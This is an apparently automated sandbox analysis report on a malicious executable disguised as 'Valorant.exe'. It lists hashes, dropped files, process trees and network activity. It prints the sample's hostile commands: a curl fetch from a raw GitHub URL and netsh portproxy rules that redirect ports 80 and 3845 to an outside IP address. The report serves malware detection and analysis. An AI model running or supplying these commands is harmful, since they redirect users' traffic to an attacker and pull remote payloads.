File name:

Valorant.exe

Full analysis: https://app.any.run/tasks/40a6e1df-4f97-4a15-9860-d2eeaa88b844
Verdict: Malicious activity
Analysis date: May 28, 2025, 00:53:40
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
github
autoit
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

FF41819A89FAAEE4046C10D630507B8E

SHA1:

31615B8B365D841542B7CB91F86097594B9ECD0D

SHA256:

765AE47DAE2CF68920E67813CB9FC0273736AC4CFDAE3571CDA856A3DAFE6568

SSDEEP:

98304:o9rem5OidboF7ToaQTD+/MiG3wAOLcn4Ob7J7Evj8I8mdTC3jaGHB/93X36XUPB8:mhZ4+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts NET.EXE for service management

      • cmd.exe (PID: 5332)
      • net.exe (PID: 5072)
      • cmd.exe (PID: 7444)
      • net.exe (PID: 7500)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • Valorant.exe (PID: 2136)
      • cmd.exe (PID: 3240)

    • Execution of CURL command

      • Valorant.exe (PID: 2136)
      • cmd.exe (PID: 3240)

    • Suspicious use of NETSH.EXE

      • cmd.exe (PID: 7980)
      • cmd.exe (PID: 8088)

    • Uses NETSH.EXE to redirect traffic

      • cmd.exe (PID: 7196)
      • cmd.exe (PID: 4608)

    • Process uses IPCONFIG to clear DNS cache

      • cmd.exe (PID: 4560)

    • There is functionality for taking screenshot (YARA)

      • Valorant.exe (PID: 2136)

    • Executable content was dropped or overwritten

      • Valorant.exe (PID: 2136)

    • Executing commands from a ".bat" file

      • Valorant.exe (PID: 2136)

    • Application launched itself

      • cmd.exe (PID: 3240)

  • INFO

    • Checks supported languages

      • Valorant.exe (PID: 2136)
      • curl.exe (PID: 7908)
      • curl.exe (PID: 6324)

    • Reads mouse settings

      • Valorant.exe (PID: 2136)

    • Execution of CURL command

      • cmd.exe (PID: 7812)
      • cmd.exe (PID: 672)

    • Reads the computer name

      • curl.exe (PID: 7908)
      • curl.exe (PID: 6324)

    • Disables trace logs

      • netsh.exe (PID: 8036)
      • netsh.exe (PID: 8144)
      • netsh.exe (PID: 5036)
      • netsh.exe (PID: 6644)

    • Create files in a temporary directory

      • Valorant.exe (PID: 2136)

    • The process uses AutoIt

      • Valorant.exe (PID: 2136)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:22 01:06:37+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.16
CodeSize: 734208
InitializedDataSize: 2636288
UninitializedDataSize: -
EntryPoint: 0x2549c
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
164
Monitored processes
34
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start valorant.exe cmd.exe no specs conhost.exe no specs net.exe no specs net1.exe no specs sppextcomobj.exe no specs slui.exe no specs cmd.exe no specs conhost.exe no specs net.exe no specs net1.exe no specs cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs ipconfig.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs curl.exe valorant.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
672C:\WINDOWS\system32\cmd.exe /c curl -s https://raw.githubusercontent.com/cometomehoney/nubshowbub/refs/heads/main/lickC:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1324\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2100"C:\Users\admin\AppData\Local\Temp\Valorant.exe" C:\Users\admin\AppData\Local\Temp\Valorant.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\appdata\local\temp\valorant.exe
c:\windows\system32\ntdll.dll
2136"C:\Users\admin\AppData\Local\Temp\Valorant.exe" C:\Users\admin\AppData\Local\Temp\Valorant.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\valorant.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\gdi32.dll
2392\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3240C:\WINDOWS\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\a.batC:\Windows\System32\cmd.exeValorant.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
4560C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\system32\ipconfig /flushdnsC:\Windows\System32\cmd.exeValorant.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
4608C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\system32\netsh interface portproxy add v4tov4 listenport=80 listenaddress=0.0.0.0 connectport=80 connectaddress=13.201.124.126 C:\Windows\System32\cmd.exeValorant.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
4988C:\WINDOWS\system32\ipconfig /flushdnsC:\Windows\System32\ipconfig.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
IP Configuration Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ipconfig.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dhcpcsvc.dll
5036C:\WINDOWS\system32\netsh interface portproxy add v4tov4 listenport=3845 listenaddress=0.0.0.0 connectport=3845 connectaddress=13.201.124.126C:\Windows\System32\netsh.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Network Command Shell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
Total events
2 517
Read events
2 514
Write events
3
Delete events
0

Modification events

(PID) Process:(8036) netsh.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{b23260c0-3cb4-11e8-bcf7-806e6f6e6963}
Operation:writeName:NameServer
Value:
(PID) Process:(5036) netsh.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
Operation:writeName:0.0.0.0/3845
Value:
13.201.124.126/3845
(PID) Process:(6644) netsh.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
Operation:writeName:0.0.0.0/80
Value:
13.201.124.126/80
Executable files
1
Suspicious files
2
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2136Valorant.exeC:\Users\admin\AppData\Local\Temp\a.battext
MD5:41341C0B43BA77303B55A40F6EE6A5EA
SHA256:F5FA5363E7F2B9A31DDFC2D06DA98D8BAE34548E2D597759927AF595BA270CE6
2136Valorant.exeC:\Users\admin\AppData\Local\Temp\Loader[100.0.3]GLOBAL.exeexecutable
MD5:7FC9D9BBE2DA7CAE99767D24F29EB431
SHA256:4BDCD22DA2B1F8BBFE71F0B9020A58B933109B303B033679E0597DF697BD1F12
2136Valorant.exeC:\Users\admin\AppData\Local\Temp\autD370.tmpbinary
MD5:7DFD04CBED1A248829F95DD234F37A4E
SHA256:DBD96ADE57017DAAD6099CB84D124966311B5015636964788F57FB5B5909D938
2136Valorant.exeC:\Users\admin\AppData\Local\Temp\autD275.tmpbinary
MD5:8D9F7C733B198D1AA9DC477D1D4D27B3
SHA256:18601EF928233494BD0FAAD1DAADD6A0D75ED791AC0E3563441F30B4A3530A1A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
27
DNS requests
17
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.166:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.48.23.166:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
23.63.118.230:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
756
lsass.exe
GET
200
104.18.38.233:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D
unknown
whitelisted
7364
SIHClient.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
756
lsass.exe
GET
200
172.64.149.23:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D
unknown
whitelisted
7364
SIHClient.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.166:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.48.23.166:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
2.23.181.156:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2.23.181.156:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
6544
svchost.exe
20.190.159.0:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7908
curl.exe
185.199.111.133:443
raw.githubusercontent.com
FASTLY
US
whitelisted
6544
svchost.exe
23.63.118.230:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.250.184.238
whitelisted
crl.microsoft.com
  • 23.48.23.166
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 2.23.181.156
whitelisted
login.live.com
  • 20.190.159.0
  • 40.126.31.71
  • 20.190.159.71
  • 40.126.31.2
  • 20.190.159.75
  • 20.190.159.73
  • 40.126.31.3
  • 40.126.31.129
whitelisted
raw.githubusercontent.com
  • 185.199.111.133
  • 185.199.108.133
  • 185.199.110.133
  • 185.199.109.133
whitelisted
ocsp.digicert.com
  • 23.63.118.230
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
ocsp.comodoca.com
  • 104.18.38.233
  • 172.64.149.23
whitelisted
ocsp.usertrust.com
  • 172.64.149.23
  • 104.18.38.233
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Valorant.exe